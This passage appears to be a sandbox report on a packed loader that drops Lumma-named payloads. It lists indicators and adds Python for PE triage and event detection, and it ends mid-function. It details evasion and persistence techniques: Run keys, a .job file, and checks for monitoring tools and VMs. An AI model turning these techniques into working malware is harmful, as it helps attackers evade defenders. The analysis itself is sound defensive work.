Source: c8a61f4196.exe.6.dr Static PE information: section name: fysdnnem
Source: c8a61f4196.exe.6.dr Static PE information: section name: nvcnsgcm
Source: c8a61f4196.exe.6.dr Static PE information: section name: .taggant
Source: Lumma111[1].exe.6.dr Static PE information: section name:
Source: Lumma111[1].exe.6.dr Static PE information: section name: .idata
Source: Lumma111[1].exe.6.dr Static PE information: section name:
Source: Lumma111[1].exe.6.dr Static PE information: section name: ucbvvkym
Source: Lumma111[1].exe.6.dr Static PE information: section name: dvaxjyps
Source: Lumma111[1].exe.6.dr Static PE information: section name: .taggant
Source: Lumma111.exe.6.dr Static PE information: section name:
Source: Lumma111.exe.6.dr Static PE information: section name: .idata
Source: Lumma111.exe.6.dr Static PE information: section name:
Source: Lumma111.exe.6.dr Static PE information: section name: ucbvvkym
Source: Lumma111.exe.6.dr Static PE information: section name: dvaxjyps
Source: Lumma111.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: akxghhwi
Source: random[1].exe1.6.dr Static PE information: section name: yjeyyxpl
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: cfc45d1c7c.exe.6.dr Static PE information: section name:
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: .idata
Source: cfc45d1c7c.exe.6.dr Static PE information: section name:
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: akxghhwi
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: yjeyyxpl
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: lgjpmlrc
Source: random[1].exe2.6.dr Static PE information: section name: fjrpqkrp
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: 686764db73.exe.6.dr Static PE information: section name:
Source: 686764db73.exe.6.dr Static PE information: section name: .idata
Source: 686764db73.exe.6.dr Static PE information: section name:
Source: 686764db73.exe.6.dr Static PE information: section name: lgjpmlrc
Source: 686764db73.exe.6.dr Static PE information: section name: fjrpqkrp
Source: 686764db73.exe.6.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000BD91C push ecx; ret 6_2_000BD92F
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Code function: 10_3_05A51B58 push ebp; retf 10_3_05A51B59
Source: file.exe Static PE information: section name: entropy: 7.979160367014145
Source: file.exe Static PE information: section name: hwqxmwlo entropy: 7.953423519074596
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.979160367014145
Source: skotes.exe.0.dr Static PE information: section name: hwqxmwlo entropy: 7.953423519074596
Source: random[1].exe.6.dr Static PE information: section name: mouszfiw entropy: 7.954712604931779
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.800415560775893
Source: ae87049195.exe.6.dr Static PE information: section name: mouszfiw entropy: 7.954712604931779
Source: c8a61f4196.exe.6.dr Static PE information: section name: entropy: 7.800415560775893
Source: Lumma111[1].exe.6.dr Static PE information: section name: entropy: 7.977377595535906
Source: Lumma111[1].exe.6.dr Static PE information: section name: ucbvvkym entropy: 7.954542090585643
Source: Lumma111.exe.6.dr Static PE information: section name: entropy: 7.977377595535906
Source: Lumma111.exe.6.dr Static PE information: section name: ucbvvkym entropy: 7.954542090585643
Source: random[1].exe1.6.dr Static PE information: section name: entropy: 7.9788040996126055
Source: random[1].exe1.6.dr Static PE information: section name: akxghhwi entropy: 7.953902225631802
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: entropy: 7.9788040996126055
Source: cfc45d1c7c.exe.6.dr Static PE information: section name: akxghhwi entropy: 7.953902225631802
Source: random[1].exe2.6.dr Static PE information: section name: lgjpmlrc entropy: 7.95444458255911
Source: 686764db73.exe.6.dr Static PE information: section name: lgjpmlrc entropy: 7.95444458255911
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Lumma111[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Jump to dropped file
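The static findings above all point at the same thing: a packer. The entry point sits in a `.taggant` section rather than `.text`, the sections that are rewritten at run time are mapped writable and executable (`EW`), two sections per file carry random eight-letter names (or no name at all), those sections have entropy close to the 8.0 maximum, and the optional-header CheckSum no longer matches the file because it was patched after linking. The script below is an added example, not part of the report and not Joe Sandbox code: a dependency-free Python triage that recovers those same indicators from a PE32 or PE32+ file. The embedded image returned by `build_sample()` is constructed inline (it reuses the section names seen in the report but contains none of the sample's code), and `KNOWN_SECTIONS` is an assumed allow-list of linker-generated names.

```python
import math
import struct

# Assumed allow-list of section names a stock MSVC/MinGW link produces; anything
# outside it (random 8-letter names, an empty name, .taggant) is reported.
KNOWN_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".00cfg", ".gfids"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(buf):
    """Bits per byte: 8.0 means uniformly distributed (compressed/encrypted) data."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data, checksum_offset):
    """Recompute the optional-header CheckSum the way imagehlp's CheckSumMappedFile
    does: sum 32-bit words with end-around carry, skipping the CheckSum field itself
    (assumed 4-byte aligned), fold to 16 bits, then add the file length."""
    total = 0
    for i in range(0, len(data), 4):
        if i == checksum_offset:
            continue
        total += struct.unpack("<I", data[i:i + 4].ljust(4, b"\0"))[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data):
    """Return (entry_rva, stored_checksum, checksum_offset, sections). AddressOfEntryPoint
    and CheckSum sit at the same optional-header offsets in PE32 and PE32+."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsect, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24
    entry, = struct.unpack_from("<I", data, opt + 16)
    stored_cs, = struct.unpack_from("<I", data, opt + 64)
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append({"name": name, "va": va, "vsize": vsize,
                         "raw": data[rawptr:rawptr + rawsize], "chars": chars})
    return entry, stored_cs, opt + 64, sections


def triage(data):
    """The static indicators listed in the report, computed from the raw bytes."""
    entry, stored_cs, cs_off, sections = parse_pe(data)
    real_cs = pe_checksum(data, cs_off)
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry < s["va"] + max(s["vsize"], len(s["raw"]))), None)
    return {
        "checksum_ok": stored_cs == real_cs,
        "stored_checksum": stored_cs,
        "real_checksum": real_cs,
        "entry_section": entry_section,
        "unknown_sections": [s["name"] for s in sections if s["name"] not in KNOWN_SECTIONS],
        "high_entropy": {s["name"]: round(shannon_entropy(s["raw"]), 3)
                         for s in sections if shannon_entropy(s["raw"]) > 7.0},
        "write_exec": [s["name"] for s in sections
                       if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE],
    }


def fix_checksum(data):
    """Write the recomputed checksum back; the result then reports checksum_ok."""
    _, _, cs_off, _ = parse_pe(data)
    patched = bytearray(data)
    struct.pack_into("<I", patched, cs_off, pe_checksum(data, cs_off))
    return bytes(patched)


def build_sample():
    """Constructed minimal PE32 (not the analysed sample): section names borrowed from
    the report, contents synthetic. Entry point in a writable+executable .taggant
    section, one random-named section of uniform bytes, CheckSum left at 0."""
    specs = [  # (name, VirtualAddress, raw bytes, Characteristics)
        (b".text", 0x1000, bytes(0x200), 0x60000020),              # R+X code
        (b".idata", 0x2000, bytes(0x200), 0x40000040),             # R data
        (b"hwqxmwlo", 0x3000, bytes(range(256)) * 2, 0x40000040),  # "packed" payload, entropy 8.0
        (b".taggant", 0x4000, b"\xCC" * 0x200, 0xE0000020),        # R+W+X, holds the entry point
    ]
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic
    struct.pack_into("<I", opt, 16, 0x4000)           # AddressOfEntryPoint -> .taggant
    struct.pack_into("<I", opt, 28, 0x400000)         # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)   # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x5000, 0x200)   # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)               # NumberOfRvaAndSizes
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, len(opt), 0x102)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    body, raw_ptr = b"", 0x200
    for name, va, raw, chars in specs:
        headers += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body += raw
        raw_ptr += len(raw)
    return headers.ljust(0x200, b"\0") + body


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for key, value in triage(data).items():
        print(f"{key:18} {value}")
```

Run it with a file path to triage a real sample, or with no arguments to see the constructed image flagged on all four counts. Two caveats when reading the output: the checksum is informational only for user-mode executables (Windows enforces it for kernel drivers and a few system DLLs, not for a dropped `.exe`), so a mismatch means post-link modification rather than a load failure; and a `.taggant` section by itself is not proof of malice, since it is emitted by commercial packers participating in the IEEE Software Taggant System, but combined with unnamed and random-named high-entropy sections and an entry point outside `.text` it is the pattern this report is describing.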

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 064deba48e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8a61f4196.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cfc45d1c7c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 686764db73.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cfc45d1c7c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cfc45d1c7c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 686764db73.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 686764db73.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 064deba48e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 064deba48e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8a61f4196.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8a61f4196.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
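The Run values that skotes.exe writes for each dropped payload and the `skotes.job` file that file.exe creates in `C:\Windows\Tasks` are the persistence behind the "New RUN Key Pointing to Suspicious Folder" Sigma hit, and the repeated `FindWindow` lookups for `PROCMON_WINDOW_CLASS`, `FilemonClass` and `RegmonClass` are the monitor-detection checks. The Python below is an added example, not part of the report and not Joe Sandbox code: it applies that detection logic to a handful of constructed Sysmon-style (Event ID 13 registry value set, Event ID 11 file create) and sandbox API-trace records. The SID in the key path, the `Details` paths (the report lists only the value names; the matching dropped-file paths appear earlier on this page), the OneDrive and `Shell_TrayWnd` control records, and the `SUSPICIOUS_DIRS` list (modelled on the folders this loader uses, not the full list in the public Sigma rule) are all assumptions. It also matches the `Software\Wine` and `HARDWARE\ACPI\DSDT\VBOX__` registry probes listed under Malware Analysis System Evasion below, since Sysmon does not log `FindWindow` or registry opens and those records would come from an API trace.

```python
import re

# User-writable folders that are a suspicious home for an autostart target.
# Assumed subset modelled on the report; the Sigma rule carries a longer list.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\inetcache\\", "\\appdata\\roaming\\",
                   "\\programdata\\", "\\users\\public\\", "\\windows\\temp\\")
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
# Legacy Task Scheduler 1.0 job files; current Windows still loads them.
TASKS_JOB_RE = re.compile(r"^[a-z]:\\windows\\tasks\\[^\\]+\.job$", re.I)
# Window classes of Process Monitor / Filemon / Regmon that the samples probe.
MONITOR_CLASSES = {"procmon_window_class", "filemonclass", "regmonclass"}
# Keys whose mere existence betrays Wine or a VirtualBox guest.
SANDBOX_KEYS = ("software\\wine", "hardware\\acpi\\dsdt\\vbox__")


def classify(event):
    """Map one event to (category, reason), or None when it is uninteresting."""
    eid = event.get("EventID")
    if eid == 13:                                   # Sysmon RegistryEvent (Value Set)
        target, data = event["TargetObject"], event.get("Details", "")
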